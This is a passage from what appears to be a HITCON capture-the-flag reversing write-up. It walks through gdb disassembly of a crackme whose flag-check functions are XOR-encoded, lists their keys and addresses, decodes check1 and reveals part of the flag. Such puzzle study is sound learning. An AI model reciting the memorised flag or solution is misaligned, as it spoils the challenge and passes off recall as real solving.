   <span class="hljs-number">0x5555555550d4</span>:    call   <span class="hljs-number">0x5555555548bc</span> <span class="hljs-comment"># supposed strncpy(rbp-0x90,rbp-0xd0,0xc)</span>
   <span class="hljs-number">0x5555555550d9</span>:    lea    rdx,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x5555555550e0</span>:    mov    rsi,QWORD PTR [rbp<span class="hljs-number">-0xf0</span>] <span class="hljs-comment"># encoded check4 function</span>
   <span class="hljs-number">0x5555555550e7</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0xe8</span>] <span class="hljs-comment"># xor key4</span>
   <span class="hljs-number">0x5555555550ee</span>:    mov    ecx,<span class="hljs-number">0xc</span>
   <span class="hljs-number">0x5555555550f3</span>:    mov    rdi,rsi
   <span class="hljs-number">0x5555555550f6</span>:    mov    rsi,rax
   <span class="hljs-number">0x5555555550f9</span>:    call   <span class="hljs-number">0x555555554a38</span> <span class="hljs-comment"># decode check function and check the flag</span>
   <span class="hljs-number">0x5555555550fe</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555555105</span>:    mov    esi,<span class="hljs-number">0x37</span>
   <span class="hljs-number">0x55555555510a</span>:    mov    rdi,rax
   <span class="hljs-number">0x55555555510d</span>:    call   <span class="hljs-number">0x55555555490f</span>
   <span class="hljs-number">0x555555555112</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x555555555119</span>:    lea    rcx,[rax+<span class="hljs-number">0x30</span>]
   <span class="hljs-number">0x55555555511d</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555555124</span>:    mov    edx,<span class="hljs-number">0x4</span>
   <span class="hljs-number">0x555555555129</span>:    mov    rsi,rcx
   <span class="hljs-number">0x55555555512c</span>:    mov    rdi,rax
   <span class="hljs-number">0x55555555512f</span>:    call   <span class="hljs-number">0x5555555548bc</span> <span class="hljs-comment"># supposed strncpy(rbp-0x90,rbp-0xd0,0x4)</span>
   <span class="hljs-number">0x555555555134</span>:    lea    rdx,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x55555555513b</span>:    mov    rcx,QWORD PTR [rbp<span class="hljs-number">-0xe0</span>] <span class="hljs-comment"># encoded check5 function</span>
   <span class="hljs-number">0x555555555142</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0xd8</span>] <span class="hljs-comment"># xor key5</span>
   <span class="hljs-number">0x555555555149</span>:    mov    rdi,rcx
   <span class="hljs-number">0x55555555514c</span>:    mov    rsi,rax
   <span class="hljs-number">0x55555555514f</span>:    call   <span class="hljs-number">0x555555554b0c</span> <span class="hljs-comment"># decode check function and check the flag</span>
   <span class="hljs-number">0x555555555154</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x55555555515b</span>:    mov    rsi,rax
   <span class="hljs-number">0x55555555515e</span>:    lea    rdi,[rip+<span class="hljs-number">0xe3</span>]        <span class="hljs-comment"># 0x555555555248</span>
   <span class="hljs-number">0x555555555165</span>:    mov    eax,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x55555555516a</span>:    call   <span class="hljs-number">0x555555554730</span> <span class="hljs-comment"># print("Congratz ! The flag is hitcon{%s} :)\n",rbp-0xd0)</span>
   <span class="hljs-number">0x55555555516f</span>:    mov    eax,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555555174</span>:    mov    rcx,QWORD PTR [rbp<span class="hljs-number">-0x8</span>]
   <span class="hljs-number">0x555555555178</span>:    xor    rcx,QWORD PTR fs:<span class="hljs-number">0x28</span>
   <span class="hljs-number">0x555555555181</span>:    je     <span class="hljs-number">0x555555555188</span>
   <span class="hljs-number">0x555555555183</span>:    call   <span class="hljs-number">0x555555554720</span>
   <span class="hljs-number">0x555555555188</span>:    leave  
   <span class="hljs-number">0x555555555189</span>:    ret   
</code></pre><p>First, it calls a test function which is totally useless. So we can just skip that part. By the way, it seems like that this program crashed in the test function.</p>
<p>Then I found that there is a decode function that can decode the check functions for flag. It&#39;s at <code>0x555555554a38</code> and <code>0x555555554b0c</code></p>
<p>It use xor to encode the check functions. In <code>gdb</code> yout can easily get the addresses of encoded functions and the xor keys</p>
<pre class="hljs"><code>                 encoded func   <span class="hljs-keyword">xor</span> key     function length
<span class="hljs-number">0x7fffffffded8</span>:  <span class="hljs-number">0x555555756020</span> <span class="hljs-number">0x8eb5034a</span>  <span class="hljs-number">0x0000010b</span>    
<span class="hljs-number">0x7fffffffdee8</span>:  <span class="hljs-number">0x555555756140</span> <span class="hljs-number">0xc6ffda44</span>  <span class="hljs-number">0x000001b1</span>    
<span class="hljs-number">0x7fffffffdef8</span>:  <span class="hljs-number">0x555555756300</span> <span class="hljs-number">0x85ea3fe1</span>  <span class="hljs-number">0x000002e4</span>    
<span class="hljs-number">0x7fffffffdf08</span>:  <span class="hljs-number">0x555555756600</span> <span class="hljs-number">0x42ad9ef2</span>  <span class="hljs-number">0x000003e6</span>    
<span class="hljs-number">0x7fffffffdf18</span>:  <span class="hljs-number">0x555555756a00</span> <span class="hljs-number">0x77e2535c</span>  <span class="hljs-number">0x000000bf</span></code></pre><p>We have five check functions here. And I manually decode the functions and read the assembly.</p>
<pre class="hljs"><code><span class="hljs-symbol">check1:</span>
   <span class="hljs-number">0</span>:   <span class="hljs-number">55</span>                      <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbp</span>
   <span class="hljs-number">1</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> e5                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbp</span>,<span class="hljs-built_in">rsp</span>
   <span class="hljs-number">4</span>:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> ec <span class="hljs-number">60</span>             <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">rsp</span>,<span class="hljs-number">0x60</span>
   <span class="hljs-number">8</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">7d</span> a8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>],<span class="hljs-built_in">rdi</span>
<span class="hljs-symbol">   c:</span>   <span class="hljs-number">89</span> <span class="hljs-number">75</span> a4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>],<span class="hljs-built_in">esi</span>
<span class="hljs-symbol">   f:</span>   <span class="hljs-number">64</span> <span class="hljs-number">48</span> 8b <span class="hljs-number">04</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
  <span class="hljs-number">16</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
  <span class="hljs-number">18</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>],<span class="hljs-built_in">rax</span>
  1c:   <span class="hljs-number">31</span> c0                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
  1e:   c7 <span class="hljs-number">45</span> c0 <span class="hljs-number">44</span> <span class="hljs-number">75</span> <span class="hljs-number">4d</span> <span class="hljs-number">62</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x40</span>],<span class="hljs-number">0x624d7544</span>
  <span class="hljs-number">25</span>:   c6 <span class="hljs-number">45</span> c4 <span class="hljs-number">00</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x3c</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">29</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> d0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x30</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">30</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">31</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> d8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">38</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">39</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> e0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x20</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">40</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">41</span>:   c7 <span class="hljs-number">45</span> e8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">48</span>:   <span class="hljs-number">66</span> c7 <span class="hljs-number">45</span> ec <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">WORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x14</span>],<span class="hljs-number">0x0</span>
  4e:   <span class="hljs-number">48</span> b8 <span class="hljs-number">49</span> <span class="hljs-number">26</span> <span class="hljs-number">72</span> <span class="hljs-number">35</span> <span class="hljs-number">76</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x413317635722649</span>
  <span class="hljs-number">55</span>:   <span class="hljs-number">31</span> <span class="hljs-number">13</span> <span class="hljs-number">04</span> 
  <span class="hljs-number">58</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> c5             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x3b</span>],<span class="hljs-built_in">rax</span>
  5c:   <span class="hljs-number">66</span> c7 <span class="hljs-number">45</span> cd 4e 5e       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">WORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x33</span>],<span class="hljs-number">0x5e4e</span>
  <span class="hljs-number">62</span>:   c6 <span class="hljs-number">45</span> cf <span class="hljs-number">00</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x31</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">66</span>:   c7 <span class="hljs-number">45</span> b8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">6d</span>:   c7 <span class="hljs-number">45</span> bc <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x44</span>],<span class="hljs-number">0x1</span>
  <span class="hljs-number">74</span>:   c7 <span class="hljs-number">45</span> b8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x0</span>
  7b:   eb <span class="hljs-number">39</span>                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0xb6</span>
  <span class="hljs-number">7d</span>:   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
  <span class="hljs-number">80</span>:   <span class="hljs-number">48</span> <span class="hljs-number">63</span> d0                <span class="hljs-keyword">movsxd</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">eax</span>
  <span class="hljs-number">83</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">45</span> a8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>]
  <span class="hljs-number">87</span>:   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
  8a:   0f b6 <span class="hljs-number">08</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
  <span class="hljs-number">8d</span>:   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
  <span class="hljs-number">90</span>:   <span class="hljs-number">99</span>                      <span class="hljs-keyword">cdq</span>    
  <span class="hljs-number">91</span>:   c1 ea 1e                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x1e</span>
  <span class="hljs-number">94</span>:   <span class="hljs-number">01</span> d0                   <span class="hljs-keyword">add</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
  <span class="hljs-number">96</span>:   <span class="hljs-number">83</span> e0 <span class="hljs-number">03</span>                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x3</span>
  <span class="hljs-number">99</span>:   <span class="hljs-number">29</span> d0                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
  9b:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
  <span class="hljs-number">9d</span>:   0f b6 <span class="hljs-number">44</span> <span class="hljs-number">05</span> c0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x40</span>]
<span class="hljs-symbol">  a2:</span>   <span class="hljs-number">83</span> e8 <span class="hljs-number">07</span>                <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x7</span>
<span class="hljs-symbol">  a5:</span>   <span class="hljs-number">31</span> c1                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
<span class="hljs-symbol">  a7:</span>   <span class="hljs-number">89</span> ca                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">ecx</span>
<span class="hljs-symbol">  a9:</span>   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
<span class="hljs-symbol">  ac:</span>   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
<span class="hljs-symbol">  ae:</span>   <span class="hljs-number">88</span> <span class="hljs-number">54</span> <span class="hljs-number">05</span> d0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x30</span>],<span class="hljs-built_in">dl</span>
<span class="hljs-symbol">  b2:</span>   <span class="hljs-number">83</span> <span class="hljs-number">45</span> b8 <span class="hljs-number">01</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x1</span>
<span class="hljs-symbol">  b6:</span>   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
<span class="hljs-symbol">  b9:</span>   3b <span class="hljs-number">45</span> a4                <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>]
<span class="hljs-symbol">  bc:</span>   7c bf                   <span class="hljs-keyword">jl</span>     <span class="hljs-number">0x7d</span>
<span class="hljs-symbol">  be:</span>   c7 <span class="hljs-number">45</span> b8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  c5:</span>   eb <span class="hljs-number">23</span>                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0xea</span>
<span class="hljs-symbol">  c7:</span>   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
<span class="hljs-symbol">  ca:</span>   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
<span class="hljs-symbol">  cc:</span>   0f b6 <span class="hljs-number">54</span> <span class="hljs-number">05</span> d0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x30</span>]
<span class="hljs-symbol">  d1:</span>   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
<span class="hljs-symbol">  d4:</span>   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
<span class="hljs-symbol">  d6:</span>   0f b6 <span class="hljs-number">44</span> <span class="hljs-number">05</span> c5          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x3b</span>]
<span class="hljs-symbol">  db:</span>   <span class="hljs-number">38</span> c2                   <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">dl</span>,<span class="hljs-built_in">al</span>
<span class="hljs-symbol">  dd:</span>   <span class="hljs-number">74</span> <span class="hljs-number">07</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0xe6</span>
<span class="hljs-symbol">  df:</span>   c7 <span class="hljs-number">45</span> bc <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x44</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  e6:</span>   <span class="hljs-number">83</span> <span class="hljs-number">45</span> b8 <span class="hljs-number">01</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x1</span>
<span class="hljs-symbol">  ea:</span>   8b <span class="hljs-number">45</span> b8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>]
<span class="hljs-symbol">  ed:</span>   3b <span class="hljs-number">45</span> a4                <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>]
<span class="hljs-symbol">  f0:</span>   7c d5                   <span class="hljs-keyword">jl</span>     <span class="hljs-number">0xc7</span>
<span class="hljs-symbol">  f2:</span>   8b <span class="hljs-number">45</span> bc                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x44</span>]
<span class="hljs-symbol">  f5:</span>   <span class="hljs-number">48</span> 8b <span class="hljs-number">75</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>]
<span class="hljs-symbol">  f9:</span>   <span class="hljs-number">64</span> <span class="hljs-number">48</span> <span class="hljs-number">33</span> <span class="hljs-number">34</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
 <span class="hljs-number">100</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">102</span>:   <span class="hljs-number">74</span> <span class="hljs-number">05</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x109</span>
 <span class="hljs-number">104</span>:   e8 b4 fc ff ff          <span class="hljs-keyword">call</span>   <span class="hljs-number">0xfffffffffffffdbd</span>
 <span class="hljs-number">109</span>:   c9                      <span class="hljs-keyword">leave</span>  
 10a:   c3                      <span class="hljs-keyword">ret</span>
</code></pre><p>check1 is easy to understand. Just a xor trick</p>
<p>The first part of flag is <code>tH4nK_U_s0</code></p>
<pre class="hljs"><code><span class="hljs-symbol">check2:</span>
   <span class="hljs-number">0</span>:   <span class="hljs-number">55</span>                      <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbp</span>
   <span class="hljs-number">1</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> e5                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbp</span>,<span class="hljs-built_in">rsp</span>
   <span class="hljs-number">4</span>:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> ec <span class="hljs-number">70</span>             <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">rsp</span>,<span class="hljs-number">0x70</span>
   <span class="hljs-number">8</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">7d</span> <span class="hljs-number">98</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x68</span>],<span class="hljs-built_in">rdi</span>
<span class="hljs-symbol">   c:</span>   <span class="hljs-number">64</span> <span class="hljs-number">48</span> 8b <span class="hljs-number">04</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
  <span class="hljs-number">13</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
  <span class="hljs-number">15</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>],<span class="hljs-built_in">rax</span>
  <span class="hljs-number">19</span>:   <span class="hljs-number">31</span> c0                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
  <span class="hljs-number">1b</span>:   c7 <span class="hljs-number">45</span> a4 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">22</span>:   c7 <span class="hljs-number">45</span> a8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">29</span>:   c7 <span class="hljs-number">45</span> ac <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">30</span>:   c7 <span class="hljs-number">45</span> b0 <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x50</span>],<span class="hljs-number">0x1</span>
  <span class="hljs-number">37</span>:   c7 <span class="hljs-number">45</span> d0 bd <span class="hljs-number">8d</span> cb <span class="hljs-number">95</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x30</span>],<span class="hljs-number">0x95cb8dbd</span>
  3e:   c7 <span class="hljs-number">45</span> d4 <span class="hljs-number">79</span> cc <span class="hljs-number">84</span> 0f    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x2c</span>],<span class="hljs-number">0xf84cc79</span>
  <span class="hljs-number">45</span>:   c7 <span class="hljs-number">45</span> d8 <span class="hljs-number">76</span> a8 <span class="hljs-number">99</span> b8    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>],<span class="hljs-number">0xb899a876</span>
  4c:   c7 <span class="hljs-number">45</span> dc <span class="hljs-number">55</span> ab <span class="hljs-number">5d</span> 0a    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x24</span>],<span class="hljs-number">0xa5dab55</span>
  <span class="hljs-number">53</span>:   c7 <span class="hljs-number">45</span> e0 ba 3b 8b 9a    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x20</span>],<span class="hljs-number">0x9a8b3bba</span>
